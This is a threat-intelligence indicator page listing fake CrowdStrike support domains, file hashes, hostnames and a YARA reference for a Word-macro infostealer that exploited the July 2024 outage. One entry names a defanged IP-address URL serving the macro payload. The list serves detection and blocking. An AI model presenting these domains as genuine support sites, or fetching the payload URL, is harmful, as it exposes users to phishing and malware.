← Back to Pulse Feed
PULSE DETAIL
PULSE NAME
Fake CrowdStrike repair manual containing malicious macros | Fake Crowdstrike Domains
WHITE CyberMike 2024-07-23 Modified: 2024-08-22
76
IOCs
HIGH VOLUME
In recent events regarding the Crowdstrike outage, this pulse has been created to list the IoCs of fake domains pretending to be Crowdstrike support as well as recent phishing attempts that indicate actors are using fake help guides that contain malicous macros
crowdstrikewindowsdaolpuchromeedgefirefoxfalcon updatefridayrecovery toolcc ccnexthijackloaderremcoslinuxpolicyinternet sitethe internetsiteorganizationinternetpersonal datacookie policysocradarcookie usagedateunderstand infojulysha256 hashword documentfalcon logscaleiocsdaolpu sha256falcon sensoranalysis luredocumentmozilla
MITRE ATT&CK & Malware Families
ATT&CK TECHNIQUES
MALWARE FAMILIES
Remcos Linux Daolpu Understand Info
Indicators of Compromise (76)
All FileHash-MD5 FileHash-SHA256 URL domain email hostname FileHash-SHA1 YARA
TYPEINDICATORDESCRIPTIONCREATED
FileHash-MD5 d845c7b471d9adc14942f95105d5ffcf 2024-07-23
FileHash-SHA256 1bbb795ce19f4dcc4ac9f8e8c12f3452f1f07c68a53ef631c76e392e1d06ea43 2024-07-23
FileHash-SHA256 4491901eff338ab52c85a77a3fbd3ce80fda738046ee3b7da7be468da5b331a3 2024-07-23
FileHash-SHA256 70865e5a49b8c270eb8175c36cd2a2032c05445c0daf59dc67e78dad545ff9e4 2024-07-23
FileHash-SHA256 96dec6e07229201a02f538310815c695cf6147c548ff1c6a0def2fe38f3dcbc8 2024-07-23
URL http://hoo.be/crowdstrike 2024-07-23
domain bsodsm8rlixamzgjedu.com 2024-07-23
domain clownstrike.co 2024-07-23
domain clownstrike.co.uk 2024-07-23
domain crashstrike.com 2024-07-23
domain crowdfalcon-immed-update.com 2024-07-23
domain crowdstrike-bluescreen.com 2024-07-23
domain crowdstrike-bsod.com 2024-07-23
domain crowdstrike-falcon.online 2024-07-23
domain crowdstrike-helpdesk.com 2024-07-23
domain crowdstrike-out.com 2024-07-23
domain crowdstrike.black 2024-07-23
domain crowdstrike.com.vc 2024-07-23
domain crowdstrike.es 2024-07-23
domain crowdstrike.fail 2024-07-23
domain crowdstrike0day.com 2024-07-23
domain crowdstrikebluescreen.com 2024-07-23
domain crowdstrikebug.com 2024-07-23
domain crowdstrikeclaim.com 2024-07-23
domain crowdstrikeclaims.com 2024-07-23
domain crowdstrikeclassaction.com 2024-07-23
domain crowdstrikedoomsday.com 2024-07-23
domain crowdstrikedown.site 2024-07-23
domain crowdstrikefail.com 2024-07-23
domain crowdstrikefix.com 2024-07-23
domain crowdstrikefixer.com 2024-07-23
domain crowdstrikeglitch.com 2024-07-23
domain crowdstrikehealthcare.com 2024-07-23
domain crowdstrikelawsuit.com 2024-07-23
domain crowdstrikeold.com 2024-07-23
domain crowdstrikeoops.com 2024-07-23
domain crowdstrikeoopsie.com 2024-07-23
domain crowdstrikeout.com 2024-07-23
domain crowdstrikeoutage.com 2024-07-23
domain crowdstrikeoutage.info 2024-07-23
domain crowdstrikerecovery.com 2024-07-23
domain crowdstrikereport.com 2024-07-23
domain crowdstrikesucks.com 2024-07-23
domain crowdstrikesuporte.com 2024-07-23
domain crowdstriketoken.com 2024-07-23
domain crowdstrikeupdate.com 2024-07-23
domain crowdstrikewindowsoutage.com 2024-07-23
domain crowdstrikezeroday.com 2024-07-23
domain crowdstuck.org 2024-07-23
domain failstrike.com 2024-07-23
domain fix-crowdstrike-apocalypse.com 2024-07-23
domain fix-crowdstrike-bsod.com 2024-07-23
domain isitcrowdstrike.com 2024-07-23
domain microsoftcrowdstrike.com 2024-07-23
domain supportfalconcrowdstrikel.com 2024-07-23
domain whatiscrowdstrike.com 2024-07-23
domain winsstrike.com 2024-07-23
email update@crowdstrike.com.vc 2024-07-23
hostname crowdstrike.orora.group 2024-07-23
hostname crowdstrike.phpartners.org 2024-07-23
hostname crowdstrike.woccpa.com 2024-07-23
hostname sinkhole-d845c7b471d9adc14942f95105d5ffcf.crowdstrikeupdate.com 2024-07-23
FileHash-SHA256 803727ccdf441e49096f3fd48107a5fe55c56c080f46773cd649c9e55ec1be61 This is a file that has been observed containing malicous macros that execute DLLs from the URL http[:]//172.104.160[.]126:8099/payload2.txt. This file is typically 2024-07-23
FileHash-SHA256 5eaf0f1c1d23f4372e24eb15ee969552c416a38dbc45e4f2b4af283e3bfb8721 2024-07-23
FileHash-MD5 9f28eef343b1a1c3639446b98b365cc9 MD5 of 3a9323a939fbecbc6d0ceb5c1e1f3ebde91e9f186b46fdf3ba1aee03d1d41cd8 2024-07-23
FileHash-MD5 d67ea3b362d4e9b633216e85ac643d1f MD5 of 5eaf0f1c1d23f4372e24eb15ee969552c416a38dbc45e4f2b4af283e3bfb8721 2024-07-23
FileHash-MD5 dd2100dfa067caae416b885637adc4ef MD5 of 803727ccdf441e49096f3fd48107a5fe55c56c080f46773cd649c9e55ec1be61 2024-07-23
FileHash-MD5 eb29329de4937b34f218665da57bcef4 MD5 of 4ad9845e691dd415420e0c253ba452772495c0b971f48294b54631e79a22644a 2024-07-23
FileHash-SHA1 1ba68f4e998ee1e405dac983084e7ef5b2d08664 SHA1 of 4ad9845e691dd415420e0c253ba452772495c0b971f48294b54631e79a22644a 2024-07-23
FileHash-SHA1 499f8881f4927e7b4a1a0448f62c60741ea6d44b SHA1 of 803727ccdf441e49096f3fd48107a5fe55c56c080f46773cd649c9e55ec1be61 2024-07-23
FileHash-SHA1 4ca0ecbbb4048e52e409f6f09562761dcc22d05f SHA1 of 3a9323a939fbecbc6d0ceb5c1e1f3ebde91e9f186b46fdf3ba1aee03d1d41cd8 2024-07-23
FileHash-SHA1 53d1c13de6e049a5b41fd3b6e5876060f73d28eb SHA1 of 5eaf0f1c1d23f4372e24eb15ee969552c416a38dbc45e4f2b4af283e3bfb8721 2024-07-23
FileHash-SHA256 00199b4784533a124da96be5d5e472195b0e27be15007dcbd573c0fb29941d99 2024-07-23
FileHash-SHA256 3a9323a939fbecbc6d0ceb5c1e1f3ebde91e9f186b46fdf3ba1aee03d1d41cd8 2024-07-23
FileHash-SHA256 4ad9845e691dd415420e0c253ba452772495c0b971f48294b54631e79a22644a 2024-07-23
YARA 1f7e214c86e4133c96143c403f9e60315c5ca4b0 C++ stealer delivered via Word documents with macros impersonating CS 2024-07-23
References (3)
↗ https://www.bleepingcomputer.com/news/security/fake-crowdstrike-repair-manual-pushes-new-daolpu-infostealer-malware/ ↗ https://socradar.io/suspicious-domains-exploiting-the-recent-crowdstrike-outage/ ↗ https://www.crowdstrike.com/blog/fake-recovery-manual-used-to-deliver-unidentified-stealer/